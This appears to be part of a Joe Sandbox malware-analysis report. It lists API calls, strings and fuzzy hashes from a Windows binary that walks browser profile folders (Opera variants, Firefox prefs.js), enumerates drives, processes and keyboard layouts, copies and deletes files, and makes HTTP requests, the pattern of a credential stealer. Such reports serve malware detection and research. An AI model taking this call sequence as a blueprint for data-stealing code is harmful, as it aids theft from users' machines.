• StrCmpCA.SHLWAPI(?,0035E258), ref: 00349BE2
• StrCmpCA.SHLWAPI(?,0035E254), ref: 00349BFC
• StrCmpCA.SHLWAPI(00000000,Opera,0035E266,0035E266,0035E266,0035E266,0035E266,0035E266,0035E266), ref: 00349C57
• StrCmpCA.SHLWAPI(00000000,Opera GX), ref: 00349C6B
• StrCmpCA.SHLWAPI(00000000,Opera Crypto), ref: 00349C7F
                                                                                                                                                                                        • Part of subcall function 0034E5B4: lstrcpyA.KERNEL32(00000000,SJ5,SJ5,?,?,00341334,SJ5,0035E266,00000000,?,00354A53,?), ref: 0034E5DA
                                                                                                                                                                                        • Part of subcall function 0034F80B: GetFileAttributesA.KERNEL32(00000000,?,?,0034AF28,?), ref: 0034F818
                                                                                                                                                                                        • Part of subcall function 00349633: FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,0035E266,0035E266,0035E264,75DAAC90), ref: 0034967F
                                                                                                                                                                                        • Part of subcall function 00349633: StrCmpCA.SHLWAPI(?,0035E258), ref: 003496A1
                                                                                                                                                                                        • Part of subcall function 00349633: StrCmpCA.SHLWAPI(?,0035E254), ref: 003496BB
                                                                                                                                                                                      • FindNextFileA.KERNEL32(?,?), ref: 0034A1D1
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrcpy$File$Find$Firstlstrcat$AttributesNextlstrlen
                                                                                                                                                                                      • String ID: Opera$Opera Crypto$Opera GX$\*.*$d5$f5
                                                                                                                                                                                      • API String ID: 3824151033-1914358469
                                                                                                                                                                                      • Opcode ID: 724f5c62ced53280bb70d210d7a6dc5eeb60c017a56d20708e9c8a771d7dafc3
                                                                                                                                                                                      • Instruction ID: 2390dde4b4448b64ff566c5ed12efeab65391644504b389c1d678e59c44c1ca1
                                                                                                                                                                                      • Opcode Fuzzy Hash: 724f5c62ced53280bb70d210d7a6dc5eeb60c017a56d20708e9c8a771d7dafc3
                                                                                                                                                                                      • Instruction Fuzzy Hash: A902E771900118AADF16FBA4DC96EEE77B8BF15304F4005A5F906AE091FE34BB49CB91
APIs
  • Part of subcall function 0034E5B4: lstrcpyA.KERNEL32(00000000,SJ5,SJ5,?,?,00341334,SJ5,0035E266,00000000,?,00354A53,?), ref: 0034E5DA
  • Part of subcall function 00343EF3: ??_U@YAPAXI@Z.MSVCRT(00000400,00361C14,ERROR), ref: 00343F1F
  • Part of subcall function 00343EF3: ??_U@YAPAXI@Z.MSVCRT(00000400,00000400,00361C14,ERROR), ref: 00343F28
  • Part of subcall function 00343EF3: ??_U@YAPAXI@Z.MSVCRT(00000400,00000400,00000400,00361C14,ERROR), ref: 00343F31
  • Part of subcall function 00343EF3: lstrlenA.KERNEL32(00000000,00000000,?,?,00361C14,ERROR), ref: 00343F4B
  • Part of subcall function 00343EF3: InternetCrackUrlA.WININET(00000000,00000000,?,00361C14), ref: 00343F5B
  • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
• InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0034507A
• StrCmpCA.SHLWAPI(?), ref: 0034508E
• InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 003450B1
• HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 003450E7
• InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 0034510B
• HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00345116
• HttpQueryInfoA.WININET(00000000,00000013,?,00000000), ref: 00345134
• InternetReadFile.WININET(00000000,?,000007CF,?), ref: 003451AE
• InternetCloseHandle.WININET(00000000), ref: 003451B9
• InternetCloseHandle.WININET(?), ref: 003451C2
• InternetCloseHandle.WININET(?), ref: 003451CB
  • Part of subcall function 0034E6D4: lstrlenA.KERNEL32(?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E6EC
  • Part of subcall function 0034E6D4: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E714
  • Part of subcall function 0034E6D4: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E71F
  • Part of subcall function 0034E63B: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,0035592A,00000000,?,?,00361408,?,00000000), ref: 0034E674
Strings
Memory Dump Source
• Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_340000_bind.jbxd
Yara matches
Similarity
• API ID: Internet$lstrcpy$CloseHandleHttp$OpenRequestlstrlen$ConnectCrackFileInfoOptionQueryReadSendlstrcat
• String ID: ERROR$GET
• API String ID: 3863758870-3591763792
• Opcode ID: 113a9d0bc4bba50d7737c00a848bceb299006f3c763adbfd15fa397caa447919
• Instruction ID: 77a176effc2423d344cb443b12bc0cc013cff22e623ae9253e1dd0cddbfb3281
• Opcode Fuzzy Hash: 113a9d0bc4bba50d7737c00a848bceb299006f3c763adbfd15fa397caa447919
• Instruction Fuzzy Hash: A7512872900109AFEF12EBE0DC85EFE7BBCEB05344F548165F506EA191EB74AE458B60
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • wsprintfA.USER32 ref: 003538FA
                                                                                                                                                                                      • FindFirstFileA.KERNEL32(?,?), ref: 00353911
                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,0035E258), ref: 00353933
                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,0035E254), ref: 0035394D
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?,00000104,?,00000104), ref: 00353982
                                                                                                                                                                                      • lstrcatA.KERNEL32(?), ref: 00353995
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 003539A9
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 003539B9
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0035E264), ref: 003539CB
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 003539DF
                                                                                                                                                                                        • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
                                                                                                                                                                                        • Part of subcall function 003469A2: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00361ECC), ref: 003469C0
                                                                                                                                                                                        • Part of subcall function 003469A2: GetFileSizeEx.KERNEL32(00000000,?), ref: 003469D7
                                                                                                                                                                                        • Part of subcall function 003469A2: LocalAlloc.KERNEL32(00000040,?,?,0035E266), ref: 003469F3
                                                                                                                                                                                        • Part of subcall function 003469A2: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,0035E266), ref: 00346A0D
                                                                                                                                                                                        • Part of subcall function 003469A2: CloseHandle.KERNEL32(?), ref: 00346A2E
                                                                                                                                                                                        • Part of subcall function 003526F8: _MSFOpenExW.MSPDB140-MSVCRT ref: 003527A0
                                                                                                                                                                                        • Part of subcall function 003526F8: CreateThread.KERNEL32(00000000,00000000,0035165F,?,00000000,00000000), ref: 003527B5
                                                                                                                                                                                        • Part of subcall function 003526F8: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 003527BD
                                                                                                                                                                                      • FindNextFileA.KERNEL32(00000000,?), ref: 00353A68
                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00353A77
Strings
Memory Dump Source
• Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_340000_bind.jbxd
Yara matches
Similarity
• API ID: lstrcat$File$Find$CloseCreate$AllocFirstHandleLocalNextObjectOpenReadSingleSizeThreadWaitlstrcpywsprintf
• String ID: %s\%s
• API String ID: 1795740556-4073750446
• Opcode ID: 04d89bab7b8d09589153aca0d1c3fe720db5f503c279a1d03705bb7cf137fd8c
• Instruction ID: ad851bc35dfc8d9d65f97cc1694fd04bb9bbdbaf8cf2565584dbc227c6ee2990
• Opcode Fuzzy Hash: 04d89bab7b8d09589153aca0d1c3fe720db5f503c279a1d03705bb7cf137fd8c
• Instruction Fuzzy Hash: DC410DB690411CABCF12EBF0DD49DDE77BCAF45305F0444A6F50AE6050EA35E78A8BA1
APIs
  • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
  • Part of subcall function 0034E682: lstrcpyA.KERNEL32(00000000,?,0035E266,00000000,00361ECC,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6BB
  • Part of subcall function 0034E682: lstrcatA.KERNEL32(?,?,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6C5
  • Part of subcall function 0034E6D4: lstrlenA.KERNEL32(?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E6EC
  • Part of subcall function 0034E6D4: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E714
  • Part of subcall function 0034E6D4: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E71F
  • Part of subcall function 0034E63B: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,0035592A,00000000,?,?,00361408,?,00000000), ref: 0034E674
• FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003614B4,0035E266,?,?,0035E266), ref: 0034AB59
• StrCmpCA.SHLWAPI(?,0035E258,?,?,0035E266), ref: 0034AB77
• StrCmpCA.SHLWAPI(?,0035E254,?,?,0035E266), ref: 0034AB91
• StrCmpCA.SHLWAPI(?,prefs.js,00000000,?,?,?,0035E264,?,?,0035E266,?,?,0035E266), ref: 0034AC08
  • Part of subcall function 0034F6B1: GetSystemTime.KERNEL32(00000000,0035E266,0035E266,00361ECC,00000000), ref: 0034F6DA
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0034ACC8
• DeleteFileA.KERNEL32(00000000), ref: 0034AD6E
• FindNextFileA.KERNELBASE(?,?,?,?,0035E266), ref: 0034ADFE
• FindClose.KERNEL32(?,?,?,0035E266), ref: 0034AE0F
Strings
Memory Dump Source
• Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_340000_bind.jbxd
Yara matches
Similarity
• API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextSystemTimelstrlen
• String ID: d5$f5$prefs.js
• API String ID: 893096357-1426651227
• Opcode ID: aa33513b6c37398c9d5176382c46d1ef8cf54a1371da98d6d5ce7d14d5752525
• Instruction ID: f44289a67f141dbbf0aacff1bc79268987f1956d8d23f13f433056d0326a63ef
• Opcode Fuzzy Hash: aa33513b6c37398c9d5176382c46d1ef8cf54a1371da98d6d5ce7d14d5752525
• Instruction Fuzzy Hash: 5D915A71D00108ABDB26FBB4DC96DEE77B8BF15304F404565F906AE092FE30AA49CA91
APIs
• GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00353706
• memset.MSVCRT ref: 00353725
• GetDriveTypeA.KERNEL32(?), ref: 0035372E
• lstrcpyA.KERNEL32(?,00000000), ref: 0035374E
• lstrcpyA.KERNEL32(?,00000000), ref: 0035376C
  • Part of subcall function 003532CD: wsprintfA.USER32 ref: 003532EC
  • Part of subcall function 003532CD: FindFirstFileA.KERNEL32(?,?), ref: 00353303
  • Part of subcall function 003532CD: memset.MSVCRT ref: 0035331C
  • Part of subcall function 003532CD: memset.MSVCRT ref: 0035332A
  • Part of subcall function 003532CD: StrCmpCA.SHLWAPI(?,0035E258), ref: 0035334D
  • Part of subcall function 003532CD: StrCmpCA.SHLWAPI(?,0035E254), ref: 00353367
  • Part of subcall function 003532CD: wsprintfA.USER32 ref: 0035338B
  • Part of subcall function 003532CD: StrCmpCA.SHLWAPI(?,0035E266), ref: 0035339C
  • Part of subcall function 003532CD: wsprintfA.USER32 ref: 003533C2
  • Part of subcall function 003532CD: memset.MSVCRT ref: 003533E8
  • Part of subcall function 003532CD: lstrcatA.KERNEL32(?,?), ref: 003533FA
  • Part of subcall function 003532CD: strtok_s.MSVCRT ref: 0035342B
  • Part of subcall function 003532CD: memset.MSVCRT ref: 00353440
  • Part of subcall function 003532CD: lstrcatA.KERNEL32(?,?), ref: 00353455
• lstrcpyA.KERNEL32(?,00000000), ref: 0035378F
• lstrlenA.KERNEL32(?), ref: 003537F1
Strings
Memory Dump Source
• Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_340000_bind.jbxd
Yara matches
Similarity
• API ID: memset$lstrcpywsprintf$Drivelstrcat$FileFindFirstLogicalStringsTypelstrlenstrtok_s
• String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
• API String ID: 1581841332-147700698
• Opcode ID: 74869cacbdc4adedbe47d4921d559806a94464eb76ef725a01cb5ee31589fd76
• Instruction ID: da9133365e24d6cb717de6a24fd9b67d93c13890f4c1623579a4af5faed909b0
• Opcode Fuzzy Hash: 74869cacbdc4adedbe47d4921d559806a94464eb76ef725a01cb5ee31589fd76
• Instruction Fuzzy Hash: D64144B1900248BFDF36EFB0DD85DEE3BACAF04395F404415B9099A062DA30AB49C7A0
APIs
  • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
• GetKeyboardLayoutList.USER32(00000000,00000000,0035E266,00361678,003613FC,00361ECC), ref: 0034E91E
• LocalAlloc.KERNEL32(00000040,00000000), ref: 0034E92C
• GetKeyboardLayoutList.USER32(00000000,00000000), ref: 0034E936
• GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0034E95B
  • Part of subcall function 0034E6D4: lstrlenA.KERNEL32(?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E6EC
  • Part of subcall function 0034E6D4: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E714
  • Part of subcall function 0034E6D4: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E71F
  • Part of subcall function 0034E63B: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,0035592A,00000000,?,?,00361408,?,00000000), ref: 0034E674
• LocalFree.KERNEL32(00000000), ref: 0034E9DB
Strings
Memory Dump Source
• Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_340000_bind.jbxd
Yara matches
Similarity
• API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
• String ID: /
• API String ID: 507856799-4001269591
• Opcode ID: 03d752b7e247c4cce3f68032e13bbfba955dd81f6c5d33e954c0f4be41ab23ec
• Instruction ID: 28e16ea48ac8b081de5973b4ebc7be55458419aaa54e2943b863c57ebe8da939
• Opcode Fuzzy Hash: 03d752b7e247c4cce3f68032e13bbfba955dd81f6c5d33e954c0f4be41ab23ec
• Instruction Fuzzy Hash: 67212771900218ABDB11EBE4DC89EEE77BCFB88350F508065F905AA181DB38EE45CB61
APIs
• _EH_prolog.MSVCRT ref: 0034F23C
• CoCreateInstance.OLE32(00362790,00000000,00000001,003618C0,?,00361678,00000000,00361ECC), ref: 0034F266
• SysAllocString.OLEAUT32(?), ref: 0034F273
• _wtoi64.MSVCRT ref: 0034F2AE
• SysFreeString.OLEAUT32(?), ref: 0034F2C9
• SysFreeString.OLEAUT32(00000000), ref: 0034F2D0
Memory Dump Source
• Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_340000_bind.jbxd
Yara matches
Similarity
• API ID: String$Free$AllocCreateH_prologInstance_wtoi64
• String ID:
• API String ID: 1816492551-0
• Opcode ID: 19dab03f2153a3fcedcea12f68468dc1278e2cc2e8a79a9e9f641317858a2bc9
• Instruction ID: fa8ace5e6e847cee0ba9d83a74f5582bd5fc8e46c6092acf50a0adbd093fdb1d
• Opcode Fuzzy Hash: 19dab03f2153a3fcedcea12f68468dc1278e2cc2e8a79a9e9f641317858a2bc9
• Instruction Fuzzy Hash: A8217C79D00649AFCB06DFA8C8849EEBFB9FF49301F188469F505EB220C7715A45CBA1
APIs
• _EH_prolog.MSVCRT ref: 0034FD1D
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?,00361ECC), ref: 0034FD43
• Process32First.KERNEL32(00000000,?), ref: 0034FD53
• Process32Next.KERNEL32(00000000,?), ref: 0034FD65
• StrCmpCA.SHLWAPI(?,?), ref: 0034FD79
• CloseHandle.KERNEL32(00000000), ref: 0034FD8F
Memory Dump Source
• Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_340000_bind.jbxd
Yara matches
Similarity
• API ID: Process32$CloseCreateFirstH_prologHandleNextSnapshotToolhelp32
• String ID:
• API String ID: 186290926-0
